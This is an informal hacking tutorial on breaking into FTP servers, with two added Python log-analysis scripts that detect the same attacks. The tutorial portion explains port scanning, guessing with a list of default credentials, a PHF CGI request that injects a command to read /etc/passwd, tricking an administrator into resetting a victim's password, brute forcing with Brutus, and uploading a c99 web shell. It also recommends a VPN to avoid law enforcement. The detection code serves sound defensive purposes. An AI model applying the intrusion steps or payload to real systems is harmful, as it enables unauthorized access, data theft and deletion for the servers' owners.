FTP Hacking
- = / Telnet Introduction \ = -
Telnet was a very handy program back in the day, especially for programmers and businessmen: it
gave them the ability to connect to their remote servers from a distant location, such as while on
a trip. Telnet connects to a host's IP (Internet Protocol) address and a port. The port is used
for communication, to state which service the user wants to connect to
(examples: SMTP, FTP, SSH, etc.), and when the user sends data, the reply is brought back
to the user through a text-based interface.
- = / Is telnet illegal? \ = -
It honestly depends on what you are using it for. If you're using it to transfer
data across a network, then it is legal. If you are using it to
gain access to a network, it is illegal.
- = / What is FTP? \ = -
FTP stands for File Transfer Protocol. It is used to send and archive files and to issue commands
about them, but when an attacker gets access to your FTP server, they can view your files,
download them, and even upload their own if they want to.
- = / Protection \ = -
Protection is the most important part of this tutorial; if you do not want to get raided
by the FBI do not bother reading this part.
Here is a recommended VPN (Virtual Private Network) that goes by the name of
Hotspot Shield.
Download it here:
http://www.hotspotshield.com
After you install it, you're shielded and ready to go!
If you have problems with the VPN during the FTP attack,
disable the shield for a minute or two.
- = / Let's begin \ = -
First, you want to download Nmap. You can download it here; just choose your installation type
and you're ready to go:
http://nmap.org/download.html
After downloading Nmap, open up "Command Prompt":
Windows Vista - Start >> Search cmd >> open >> Type nmap your-target-here.com
Windows XP - Run >> Type cmd and/or command prompt >> type nmap your-target-here.com
Then your scan should start. Go grab yourself a coffee, and when you're back,
all the open ports should be listed there.
You better hope port 21 is open, because that is the port used for our FTP attack.
If it's closed -------- Try another victim
If it's open -------- continue reading on!
Now that we have passed that part, we have to do some vulnerability testing.
First, we have to try commonly used passwords. So open up Command Prompt and type in
ftp your-target-here.com
Now you're connected to the protocol, but not the network. So let's try out some default passwords first.
r00t:r00t
root:root
Fred:Fred
r00t:Password
root:Password
Admin:Password
Administrator:Password
Admin:Pass123
Admin:qwerty
Admin:Site-name-here
Owner:administrator
Admin:god
Admin:secret
Admin:Sex
Admin:love
Admin:Password123
Admin:ftp360
Admin:ftp21
Admin:2sexy
Admin:qwert
I came across default passwords for UNIX systems, so I recommend you try these as well:
http://www.securityspace.com/smysecure/catdescr.html?cat=Default+Unix+Accounts
Those are some commonly used ones I have come across before.
Test all those first; if you don't get a successful reply, continue reading on.
Also, some FTP servers have an anonymous login, meaning
it has no password, or you can log in with anything.
So, try the default passwords, and check if the system has an anonymous login.
The next method I am going to show you is called PHF.
PHF was first discovered when two young teenagers got full access to the fbi.gov site using the PHF method.
But what exactly does it do? It is a file located in the cgi-bin which gives remote access
to all files, including /etc/passwd.
Here is an example for you:
TargetHere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
That is PHF.
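From the server side, a request like the one above stands out in the web access log: a phf script under /cgi-bin/ and a URL-encoded newline (%0a) inside a query parameter. The following is an added example, not from the original tutorial, that scans Common Log Format lines for those markers. The log lines are constructed, and the function names classify and scan are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Client address, request target and status code from a Common Log Format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+)[^"]*" (\d{3})')

# Sample access-log lines, constructed for this example (documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.23 - - [03/Mar/2014:10:15:01 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1042
192.0.2.10 - - [03/Mar/2014:10:15:05 +0000] "GET /index.html HTTP/1.0" 200 512
192.0.2.44 - - [03/Mar/2014:10:16:40 +0000] "GET /cgi-bin/search?q=ftp%20server HTTP/1.0" 200 733
198.51.100.23 - - [03/Mar/2014:10:17:02 +0000] "GET /cgi-bin/PHF?Qalias=x%0Aid HTTP/1.0" 404 210
"""

def classify(target):
    """Return the reasons a request target looks like a CGI command-injection probe."""
    parts = urlsplit(target)
    reasons = []
    if not parts.path.lower().startswith("/cgi-bin/"):
        return reasons
    if parts.path.lower().rsplit("/", 1)[-1] == "phf":
        reasons.append("phf-script")
    decoded = unquote(parts.query)          # %0a -> "\n", %20 -> " "
    if "\n" in decoded or "\r" in decoded:
        reasons.append("newline-in-query")  # a newline lets a shell see a second command
    if "/etc/passwd" in decoded:
        reasons.append("passwd-read")
    return reasons

def scan(log_text):
    """Return one finding per suspicious request; 'served' marks a 2xx response."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        reasons = classify(target)
        if reasons:
            findings.append({"client": client, "status": int(status),
                             "reasons": reasons, "served": status.startswith("2")})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with served set to True means the server answered the probe with a 2xx status, so that host needs the script removed and the response reviewed first.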
The other way is social engineering. If you got some information, you should have the host type
they have; in this case, let's say, FanFusion. FanFusion is used by
people who want to build a website for a person they like,
for example, wrestlers, celebrities, etc.
I will contact the administrator, tell them my (the victim's) email
is not working so I cannot use the link for forgotten passwords,
and tell the admin what password I want for our target.
That is social engineering; it works a lot of times.
If we cannot use social engineering, and the attempt failed,
we can use a different method called "brute forcing".
We will use 'Brutus' in our attempt.
Download Brutus:
http://www.hoobie.net/brutus/
It allows FTP bruting, telnet bruting, etc.
Start it up and enter the IP in Target.
In Type, press it and select FTP.
In Port, type in 21, since that is the main
port for FTP.
Then move down to Authentication Options.
Now, on your desktop, create users.txt
and passwords.txt; they have to include
names and passwords. In a simpler
explanation: users.txt holds the users (usernames),
passwords.txt holds the passwords.
Now press Start, and it should start scanning.
Take a nap, wake up, start up your computer,
and pray the password is cracked.
- = / What to do when you're in \ = -
You can upload a shell: c99, mshell2, etc. To do that, type in
mput (without the comma), then it will ask for the local files. You will put where the shell is saved, for example, C:\users\r00t\c99.php, then press enter, and then it downloads it to the directory. Then go to the site, and after the / put in the file name you gave the shell, for example, SITE-Here.com/c99.php
Then it should redirect you to your shell.
If you want to scan the files, type in dir (without the comma), then it should display all the files. Remember, some can be .FileName and others can be just FileName. Now, to open the file, type in dir .filename, then it should display the contents. If you want to view the file, type in dir .filename what-you-want-to-see
Remember, some can be .filename and others can be just filename without the period.
You can also delete files: simply type in mdelete or delete, then enter the remote file and press enter.
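
The default-password attempts, the Brutus run and the shell upload described above all leave a trail in the FTP server's own log. As an added example (not part of the original tutorial), this Python code correlates a burst of failed logins with a later successful login and a script upload from the same client. The log lines are constructed in vsftpd's log style, and the thresholds and the names analyze, max_fails and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Sample lines in vsftpd's native log style, constructed for this example.
SAMPLE_LOG = """\
Mon Mar  3 10:15:01 2014 [pid 4101] [admin] FAIL LOGIN: Client "198.51.100.23"
Mon Mar  3 10:15:03 2014 [pid 4102] [admin] FAIL LOGIN: Client "198.51.100.23"
Mon Mar  3 10:15:05 2014 [pid 4103] [root] FAIL LOGIN: Client "198.51.100.23"
Mon Mar  3 10:15:07 2014 [pid 4104] [admin] FAIL LOGIN: Client "198.51.100.23"
Mon Mar  3 10:15:09 2014 [pid 4105] [admin] FAIL LOGIN: Client "198.51.100.23"
Mon Mar  3 10:15:12 2014 [pid 4106] [admin] OK LOGIN: Client "198.51.100.23"
Mon Mar  3 10:16:30 2014 [pid 4108] [admin] OK UPLOAD: Client "198.51.100.23", "/var/www/html/c99.php", 48211 bytes, 95.10Kbyte/sec
Mon Mar  3 10:20:00 2014 [pid 4110] [alice] FAIL LOGIN: Client "192.0.2.10"
Mon Mar  3 10:20:20 2014 [pid 4111] [alice] OK LOGIN: Client "192.0.2.10"
Mon Mar  3 10:21:00 2014 [pid 4113] [alice] OK UPLOAD: Client "192.0.2.10", "/home/alice/report.pdf", 90210 bytes, 120.00Kbyte/sec
"""

LINE_RE = re.compile(r'^(\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] \[([^\]]*)\] '
                     r'(OK|FAIL) (LOGIN|UPLOAD): Client "([^"]+)"(?:, "([^"]+)")?')
SCRIPT_EXT = (".php", ".phtml", ".asp", ".aspx", ".jsp", ".cgi", ".pl")

def analyze(log_text, max_fails=5, window=timedelta(minutes=5)):
    """Flag clients whose failed-login burst is followed by a login and a script upload."""
    fails = defaultdict(list)    # client -> timestamps of failed logins
    alerts = defaultdict(list)   # client -> alerts in the order they fired
    guessed = set()              # clients that logged in right after a burst
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        stamp, user, result, action, client, path = m.groups()
        when = datetime.strptime(" ".join(stamp.split()), "%a %b %d %H:%M:%S %Y")
        if action == "LOGIN" and result == "FAIL":
            fails[client].append(when)
        recent = [t for t in fails[client] if when - t <= window]
        if action == "LOGIN" and result == "FAIL" and len(recent) == max_fails:
            alerts[client].append("password-guessing")
        elif action == "LOGIN" and result == "OK" and len(recent) >= max_fails:
            guessed.add(client)
            alerts[client].append(f"login-after-guessing:{user}")
        elif action == "UPLOAD" and result == "OK" and path.lower().endswith(SCRIPT_EXT):
            tag = "script-upload-after-guessing" if client in guessed else "script-upload"
            alerts[client].append(f"{tag}:{path}")
    return dict(alerts)

if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

The single mistyped password from 192.0.2.10 stays below the threshold and raises nothing, while the other client produces all three alerts in sequence.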